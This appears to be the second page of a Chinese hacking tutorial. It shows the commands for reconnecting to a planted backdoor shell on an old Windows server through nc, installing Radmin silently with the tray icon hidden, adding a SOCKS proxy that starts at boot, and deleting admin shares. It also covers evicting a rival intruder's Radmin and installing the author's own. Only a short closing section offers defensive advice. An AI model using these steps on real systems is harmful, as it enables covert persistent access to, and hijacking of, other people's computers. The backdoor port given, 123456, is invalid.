|
后门端口123456
F:\hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version
[Melody�]#
下面安装radmin
配置好的radmin客户端有4个文件。配置radmin客户端可参考相关文章
radmin.reg
raddrv.dll
admdll.dll
r_server.exe
把这个4个文件copy c:\winnt\system32
在目录下面执行命令
c:\winnt\system32>r_server /s radmin.reg -----导入注册表
c:\winnt\system32>r_server /install /silence -----安装radmin.并且不显示托盘
c:\winnt\system32>net start r_server----- 启动服务
可以开启3389的话你自己看着办把,哈哈
安装sock代理
把sksockserver.exe copy c:\winnt\system32
c:\winnt\system32>sksockserver /install-----安装服务
c:\winnt\system32>sksockserver -config port 1234----端口定在1234自己可以改
c:\winnt\system32>sksockserver -config starttype 2----开机自动启动
c:\winnt\system32>net start skserver ----启动服务
最后删除共享
net share ipc$Content$nbsp;/del
net share admin$Content$nbsp;/del
在安装radmin的时候你发现有人已经安装了。。怎么办?走人?--------NO
看操作 (我输入的内容)
后门连接
F:\hack>nc 211.217.50.xx 123456
Welcome To WinEggDropShell Matrix Version
[Melody�]#(pslist)
[Melody�]#(pskill r_server)
[Melody�]#(shell)
c:\winnt\system32>(del r_server.exe)
c:\winnt\system32>(del admdll.dll)
c:\winnt\system32>(del raddrv.dll)
copy你自己的上去,然后安装
省事的办法直接导入注册表,然后重新输入安装命令运行,就可以了,只是在原来默认端口上面架上了密
码
等等。。。。为什么我输入导入注册表命令不管用呢?出现什么regedit不是可运行的程序之类的 。
完了,努力白费了。。。。。。。 -----------------------------NO
出现这样的情况最简单的解决办法telnet上去导入试试看,什么?不是把,有没有搞错阿。。。
呵呵,尽管放心,去试试看就知道;还可以先运行radmin 然后在radmin的dos下导入,也是可以的
嗬嗬,去试试看吧
防御办法:
安装rpc补丁
使用防火墙过滤135,445,139等端口
完全菜鸟级别,高手莫见怪,恳求高手指导
QQ:502478 上一页 [1] [2] |
